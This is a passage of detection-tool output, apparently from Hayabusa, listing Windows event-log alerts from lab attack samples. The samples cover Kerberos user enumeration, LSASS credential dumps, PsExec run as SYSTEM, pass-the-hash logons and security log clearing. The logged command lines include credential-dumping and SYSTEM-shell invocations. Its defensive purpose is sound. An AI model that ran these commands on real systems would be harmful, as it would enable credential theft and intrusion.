SM_27d255b6407743b08 | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x12 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx +2021-12-03 21:06:07.010 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: SM_2b6f1a51ac6c41b2a | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x12 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx +2021-12-03 21:06:07.014 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: SM_25e3b4425ffd47aab | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x12 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx +2021-12-03 21:06:07.021 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: SM_8b9faa99d83446d1b | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x12 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx +2021-12-03 21:06:07.031 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: SM_6aaeeb113c0c4af3a | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x12 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential 
Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx +2021-12-03 21:06:07.035 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: SM_2f6964c8f421408ab | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x12 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx +2021-12-03 21:06:07.047 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: SM_374806bcc65140a5a | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x12 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx +2021-12-03 21:06:07.052 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: SM_b2a35e76f50a4c23a | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x12 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx +2021-12-03 21:06:07.056 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: SM_957258b5879242afb | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x12 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx +2021-12-03 21:06:11.514 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: hack1 | Svc: krbtgt | IP Addr: ::ffff:10.23.123.11 | Status: 0x0 | PreAuthType: 
2,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx +2021-12-03 21:06:11.878 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: hacker2 | Svc: krbtgt | IP Addr: ::ffff:10.23.123.11 | Status: 0x0 | PreAuthType: 0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx +2021-12-03 21:06:12.553 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: dsrm | Svc: krbtgt | IP Addr: ::ffff:10.23.123.11 | Status: 0x0 | PreAuthType: 2,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx +2021-12-05 05:59:31.403 +09:00,fs03vuln.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\SYSTEM32\cmd.exe /c ""C:\tools\shell.cmd"" | Path: C:\Windows\System32\cmd.exe | PID: 0x13a4 | User: FS03VULN$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-Task Manager access indicator for potential LSASS dump.evtx +2021-12-05 06:10:40.723 +09:00,fs03vuln.offsec.lan,11,info,,File Created,Path: C:\Users\admmig\AppData\Local\Temp\lsass (4).DMP | Process: C:\Windows\System32\Taskmgr.exe | PID: 3504 | PGUID: A57649D1-D6B1-61AB-A5E4-D70100000000,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID11-LSASS credentials dump via Task Manager.evtx 
+2021-12-05 06:10:40.723 +09:00,fs03vuln.offsec.lan,11,high,CredAccess,LSASS Memory Dump File Creation,,../hayabusa-rules/sigma/file_event/sysmon_lsass_memory_dump_file_creation.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID11-LSASS credentials dump via Task Manager.evtx +2021-12-05 06:10:40.723 +09:00,fs03vuln.offsec.lan,11,high,CredAccess,LSASS Process Memory Dump Files,,../hayabusa-rules/sigma/file_event/file_event_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID11-LSASS credentials dump via Task Manager.evtx +2021-12-05 06:19:16.741 +09:00,fs03vuln.offsec.lan,1,high,,Process Created_Sysmon Alert,"technique_id=T1035,technique_name=Service Execution | Cmd: PsExec64.exe -i -s cmd | Process: C:\TOOLS\PsExec64.exe | User: OFFSEC\admmig | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x83ef56 | PID: 2124 | PGUID: A57649D1-DB54-61AB-775C-DC0100000000 | Hash: SHA1=FB0A150601470195C47B4E8D87FCB3F50292BEB2,MD5=9321C107D1F7E336CDA550A2BF049108,SHA256=AD6B98C01EE849874E4B4502C3D7853196F6044240D3271E4AB3FC6E3C08E9A4,IMPHASH=159D56D406180A332FBC99290F30700E",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID11,13,17,18-PSexec as system execution.evtx" +2021-12-05 06:19:16.757 +09:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1035,technique_name=Service Execution | SetValue: HKU\S-1-5-21-4230534742-2542757381-3142984815-1111\Software\Sysinternals\PsExec\EulaAccepted: DWORD (0x00000001) | Process: C:\TOOLS\PsExec64.exe | PID: 2124 | PGUID: A57649D1-DB54-61AB-775C-DC0100000000",../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID11,13,17,18-PSexec as system execution.evtx" +2021-12-05 06:19:16.757 
+09:00,fs03vuln.offsec.lan,11,info,,File Created,Path: C:\Windows\PSEXESVC.exe | Process: C:\TOOLS\PsExec64.exe | PID: 2124 | PGUID: A57649D1-DB54-61AB-775C-DC0100000000,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID11,13,17,18-PSexec as system execution.evtx" +2021-12-05 06:19:16.757 +09:00,fs03vuln.offsec.lan,11,low,Exec,PsExec Tool Execution,,../hayabusa-rules/sigma/file_event/file_event_tool_psexec.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID11,13,17,18-PSexec as system execution.evtx" +2021-12-05 06:19:16.757 +09:00,fs03vuln.offsec.lan,13,low,ResDev,Usage of Sysinternals Tools,,../hayabusa-rules/sigma/registry_event/registry_event_sysinternals_eula_accepted.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID11,13,17,18-PSexec as system execution.evtx" +2021-12-05 06:19:16.804 +09:00,fs03vuln.offsec.lan,17,medium,,Pipe Created_Sysmon Alert,"technique_id=T1077,technique_name=Windows Admin Shares | Pipe: \PSEXESVC | Process: C:\Windows\PSEXESVC.exe | PID: 4752 | PGUID: A57649D1-DB54-61AB-2B62-DC0100000000",../hayabusa-rules/hayabusa/sysmon/alerts/17_PipeCreated_SysmonAlert.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID11,13,17,18-PSexec as system execution.evtx" +2021-12-05 06:19:16.804 +09:00,fs03vuln.offsec.lan,17,low,Exec,PsExec Tool Execution,,../hayabusa-rules/sigma/pipe_created/pipe_created_tool_psexec.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID11,13,17,18-PSexec as system execution.evtx" +2021-12-05 06:19:16.913 +09:00,fs03vuln.offsec.lan,18,medium,,Pipe Connected_Sysmon Alert,"technique_id=T1077,technique_name=Windows Admin Shares | Pipe: \PSEXESVC | Process: System | PID: 4 | PGUID: 
A57649D1-92D1-61A4-EB03-000000000000",../hayabusa-rules/hayabusa/sysmon/alerts/18_PipeConnected_SysmonAlert.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID11,13,17,18-PSexec as system execution.evtx" +2021-12-05 06:19:16.913 +09:00,fs03vuln.offsec.lan,17,medium,,Pipe Created_Sysmon Alert,"technique_id=T1077,technique_name=Windows Admin Shares | Pipe: \PSEXESVC-FS03VULN-2124-stdin | Process: C:\Windows\PSEXESVC.exe | PID: 4752 | PGUID: A57649D1-DB54-61AB-2B62-DC0100000000",../hayabusa-rules/hayabusa/sysmon/alerts/17_PipeCreated_SysmonAlert.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID11,13,17,18-PSexec as system execution.evtx" +2021-12-05 06:19:16.913 +09:00,fs03vuln.offsec.lan,18,low,Exec,PsExec Tool Execution,,../hayabusa-rules/sigma/pipe_created/pipe_created_tool_psexec.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID11,13,17,18-PSexec as system execution.evtx" +2021-12-05 06:19:16.913 +09:00,fs03vuln.offsec.lan,17,medium,,Pipe Created_Sysmon Alert,"technique_id=T1077,technique_name=Windows Admin Shares | Pipe: \PSEXESVC-FS03VULN-2124-stdout | Process: C:\Windows\PSEXESVC.exe | PID: 4752 | PGUID: A57649D1-DB54-61AB-2B62-DC0100000000",../hayabusa-rules/hayabusa/sysmon/alerts/17_PipeCreated_SysmonAlert.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID11,13,17,18-PSexec as system execution.evtx" +2021-12-05 06:19:16.913 +09:00,fs03vuln.offsec.lan,17,medium,,Pipe Created_Sysmon Alert,"technique_id=T1077,technique_name=Windows Admin Shares | Pipe: \PSEXESVC-FS03VULN-2124-stderr | Process: C:\Windows\PSEXESVC.exe | PID: 4752 | PGUID: A57649D1-DB54-61AB-2B62-DC0100000000",../hayabusa-rules/hayabusa/sysmon/alerts/17_PipeCreated_SysmonAlert.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID11,13,17,18-PSexec as system execution.evtx" +2021-12-05 06:19:16.929 +09:00,fs03vuln.offsec.lan,18,medium,,Pipe Connected_Sysmon 
Alert,"technique_id=T1077,technique_name=Windows Admin Shares | Pipe: \PSEXESVC-FS03VULN-2124-stdin | Process: C:\TOOLS\PsExec64.exe | PID: 2124 | PGUID: A57649D1-DB54-61AB-775C-DC0100000000",../hayabusa-rules/hayabusa/sysmon/alerts/18_PipeConnected_SysmonAlert.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID11,13,17,18-PSexec as system execution.evtx" +2021-12-05 06:19:16.929 +09:00,fs03vuln.offsec.lan,1,high,,Process Created_Sysmon Alert,"technique_id=T1059,technique_name=Command-Line Interface | Cmd: ""cmd"" | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\PSEXESVC.exe | LID: 0x3e7 | PID: 540 | PGUID: A57649D1-DB54-61AB-0467-DC0100000000 | Hash: SHA1=7C3D7281E1151FE4127923F4B4C3CD36438E1A12,MD5=F5AE03DE0AD60F5B17B82F2CD68402FE,SHA256=6F88FB88FFB0F1D5465C2826E5B4F523598B1B8378377C8378FFEBC171BAD18B,IMPHASH=77AED1ADAF24B344F08C8AD1432908C3",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID11,13,17,18-PSexec as system execution.evtx" +2021-12-05 06:19:16.929 +09:00,fs03vuln.offsec.lan,18,medium,,Pipe Connected_Sysmon Alert,"technique_id=T1077,technique_name=Windows Admin Shares | Pipe: \PSEXESVC-FS03VULN-2124-stdout | Process: C:\TOOLS\PsExec64.exe | PID: 2124 | PGUID: A57649D1-DB54-61AB-775C-DC0100000000",../hayabusa-rules/hayabusa/sysmon/alerts/18_PipeConnected_SysmonAlert.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID11,13,17,18-PSexec as system execution.evtx" +2021-12-05 06:19:16.929 +09:00,fs03vuln.offsec.lan,18,medium,,Pipe Connected_Sysmon Alert,"technique_id=T1077,technique_name=Windows Admin Shares | Pipe: \PSEXESVC-FS03VULN-2124-stderr | Process: C:\TOOLS\PsExec64.exe | PID: 2124 | PGUID: 
A57649D1-DB54-61AB-775C-DC0100000000",../hayabusa-rules/hayabusa/sysmon/alerts/18_PipeConnected_SysmonAlert.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID11,13,17,18-PSexec as system execution.evtx" +2021-12-05 06:19:17.757 +09:00,fs03vuln.offsec.lan,22,info,,DNS Query,Query: fs03vuln | Result: 10.23.42.38; | Process: C:\TOOLS\PsExec64.exe | PID: 2124 | PGUID: A57649D1-DB54-61AB-775C-DC0100000000,../hayabusa-rules/hayabusa/sysmon/events/22_DNS-Query.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID11,13,17,18-PSexec as system execution.evtx" +2021-12-05 07:09:13.666 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x10e6e8ef8,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4724-5145-password reset with setNTLM (Mimikatz).evtx +2021-12-05 07:09:13.671 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x10e6e8f26,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4724-5145-password reset with setNTLM (Mimikatz).evtx +2021-12-05 07:09:13.672 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x10e6e8f3e,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4724-5145-password reset with setNTLM (Mimikatz).evtx +2021-12-05 07:09:13.673 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 
0x10e6e8f54,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4724-5145-password reset with setNTLM (Mimikatz).evtx +2021-12-05 07:09:18.652 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: ROOTDC1$ | Computer: - | IP Addr: fe80::1cae:5aa4:9d8d:106a | LID: 0x10e6e929b,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4724-5145-password reset with setNTLM (Mimikatz).evtx +2021-12-08 02:33:01.409 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: MalSeclogon.exe -p 636 -d 2 | Process: \\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x53ca2 | PID: 8612 | PGUID: 747F3D96-9ACD-61AF-D301-000000000102",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/tutto_malseclogon.evtx +2021-12-08 02:33:01.474 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: - | LID: 0x3e7 | PID: 7108 | PGUID: 747F3D96-9ACD-61AF-D401-000000000102,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/tutto_malseclogon.evtx +2021-12-08 02:33:01.485 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\system32\svchost.exe | Tgt Process: C:\Windows\system32\svchost.exe | Src User: NT AUTHORITY\NETWORK SERVICE | Tgt User: NT AUTHORITY\SYSTEM | Access: 0x100000 | Src PID: 884 | Src PGUID: 747F3D96-0BA4-61B0-1200-000000000102 | Tgt PID: 7108 | Tgt PGUID: 
747F3D96-9ACD-61AF-D401-000000000102,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/tutto_malseclogon.evtx +2021-12-08 02:33:01.616 +09:00,MSEDGEWIN10,4624,info,,Logon Type 9 - NewCredentials,User: IEUser | Computer: - | IP Addr: ::1 | LID: 0x16e3db3 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-9-NewInteractive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/tutto_malseclogon.evtx +2021-12-08 02:33:01.616 +09:00,MSEDGEWIN10,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/tutto_malseclogon.evtx +2021-12-08 02:33:01.616 +09:00,MSEDGEWIN10,4624,high,LatMov,Successful Overpass the Hash Attempt,,../hayabusa-rules/sigma/builtin/security/win_overpass_the_hash.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/tutto_malseclogon.evtx +2021-12-08 02:33:01.636 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: MalSeclogon.exe -p 636 -d 2 -l 1 | Process: \\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: - | LID: 0x16e3db3 | PID: 6072 | PGUID: 747F3D96-9ACD-61AF-D501-000000000102,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/tutto_malseclogon.evtx +2021-12-08 02:33:01.638 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: Z:\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe | Tgt Process: Z:\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe | Src User: MSEDGEWIN10\IEUser | Tgt User: MSEDGEWIN10\IEUser | Access: 0x100000 | Src PID: 8612 | Src PGUID: 747F3D96-9ACD-61AF-D301-000000000102 | Tgt PID: 6072 | Tgt PGUID: 
747F3D96-9ACD-61AF-D501-000000000102,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/tutto_malseclogon.evtx +2021-12-08 02:33:01.680 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: Z:\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: MSEDGEWIN10\IEUser | Tgt User: NT AUTHORITY\SYSTEM | Access: 0x1410 | Src PID: 6072 | Src PGUID: 747F3D96-9ACD-61AF-D501-000000000102 | Tgt PID: 5268 | Tgt PGUID: 747F3D96-9ACD-61AF-D701-000000000102,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/tutto_malseclogon.evtx +2021-12-08 02:33:01.680 +09:00,MSEDGEWIN10,10,high,CredAccess,Suspicious GrantedAccess Flags on LSASS Access,,../hayabusa-rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/tutto_malseclogon.evtx +2021-12-08 02:33:01.680 +09:00,MSEDGEWIN10,10,high,CredAccess,Credentials Dumping Tools Accessing LSASS Memory,,../hayabusa-rules/sigma/process_access/sysmon_cred_dump_lsass_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/tutto_malseclogon.evtx +2021-12-09 22:41:50.714 +09:00,fs03vuln.offsec.lan,1102,high,Evas,Security Log Cleared,User: hack1,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1134-Access Token Manipulation/ID4688,4624-RottenPotatoNG.evtx" +2021-12-10 03:50:47.980 +09:00,FS03.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx" +2021-12-10 03:50:55.333 +09:00,FS03.offsec.lan,4672,info,,Admin 
Logon,User: hack1 | LID: 0x2a2d4d5,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx" +2021-12-10 03:50:55.349 +09:00,FS03.offsec.lan,4672,info,,Admin Logon,User: hack1 | LID: 0x2a2d4ed,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx" +2021-12-10 03:50:55.349 +09:00,FS03.offsec.lan,4672,info,,Admin Logon,User: hack1 | LID: 0x2a2d4fe,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx" +2021-12-10 03:50:55.349 +09:00,FS03.offsec.lan,4672,info,,Admin Logon,User: hack1 | LID: 0x2a2d51f,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx" +2021-12-10 03:50:55.349 +09:00,FS03.offsec.lan,4672,info,,Admin Logon,User: hack1 | LID: 0x2a2d532,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx" +2021-12-10 03:50:55.349 +09:00,FS03.offsec.lan,4624,info,,Logon Type 3 - Network,User: hack1 | Computer: - | IP Addr: 10.23.42.38 | LID: 0x2a2d4d5,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission 
change via WMI (DAMP).evtx" +2021-12-10 03:50:55.349 +09:00,FS03.offsec.lan,4624,info,,Logon Type 3 - Network,User: hack1 | Computer: - | IP Addr: 10.23.42.38 | LID: 0x2a2d4ed,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx" +2021-12-10 03:50:55.349 +09:00,FS03.offsec.lan,4624,info,,Logon Type 3 - Network,User: hack1 | Computer: - | IP Addr: 10.23.42.38 | LID: 0x2a2d4fe,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx" +2021-12-10 03:50:55.349 +09:00,FS03.offsec.lan,4624,info,,Logon Type 3 - Network,User: hack1 | Computer: - | IP Addr: 10.23.42.38 | LID: 0x2a2d51f,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx" +2021-12-10 03:50:55.349 +09:00,FS03.offsec.lan,4624,info,,Logon Type 3 - Network,User: hack1 | Computer: - | IP Addr: 10.23.42.38 | LID: 0x2a2d532,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx" +2021-12-10 03:50:55.958 +09:00,FS03.offsec.lan,4673,medium,CredAccess | Impact,Process Ran With High Privilege,Process: C:\Windows\System32\wbem\WmiPrvSE.exe | User: hack1 | LID: 0x2a2d532,../hayabusa-rules/hayabusa/default/alerts/Security/4673_PrivilegedServiceCalled_UnknownProcessUsedHighPrivilege.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify 
